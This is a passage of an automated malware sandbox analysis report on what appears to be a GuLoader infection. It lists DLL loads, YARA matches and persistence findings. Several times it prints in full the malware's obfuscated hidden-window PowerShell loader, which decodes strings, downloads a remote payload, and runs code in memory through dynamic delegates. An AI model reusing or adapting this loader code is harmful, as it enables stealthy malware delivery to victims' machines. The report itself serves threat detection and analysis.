              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2417345393.0000000008268000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 00000010.00000002.2590132545.0000000002DC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.0000000007247000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0 source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2419849580.0000000009833000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2419273887.0000000008590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Solderistens)$GLobAL:OVERflORid = [SYsTEm.tExt.encOdInG]::AscII.geTStrinG($SammEnFaldeneS)$globAL:ALlElUJa78=$OVeRfLOrId.sUbstRIng($BEGRaVeLSesafTaLe,$kUVerts)<#Beseglingen Pivsures
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Forbrugerbeskyttende $sagittaries $Teknikumets), (jobsoegning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Diversionist = [AppDomain]::CurrentDomain.Get
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skidded)), $Petters).DefineDynamicModule($sollegemes, $false).DefineType($Mazedly, $Esoterical, [System.MulticastDelegate])$Opnormered
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Solderistens)$GLobAL:OVERflORid = [SYsTEm.tExt.encOdInG]::AscII.geTStrinG($SammEnFaldeneS)$globAL:ALlElUJa78=$OVeRfLOrId.sUbstRIng($BEGRaVeLSesafTaLe,$kUVerts)<#Beseglingen Pivsures
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aH
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm I
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347678A6 push ebx; retf 2_2_00007FFD3476796A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3476797B push ebx; retf 2_2_00007FFD3476796A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045DC890 pushfd ; ret 5_2_045DC899
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2806 push ecx; ret 9_2_21BD2819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4

              Boot Survival

              barindex
              Powershell creates an autostart link
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebui
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 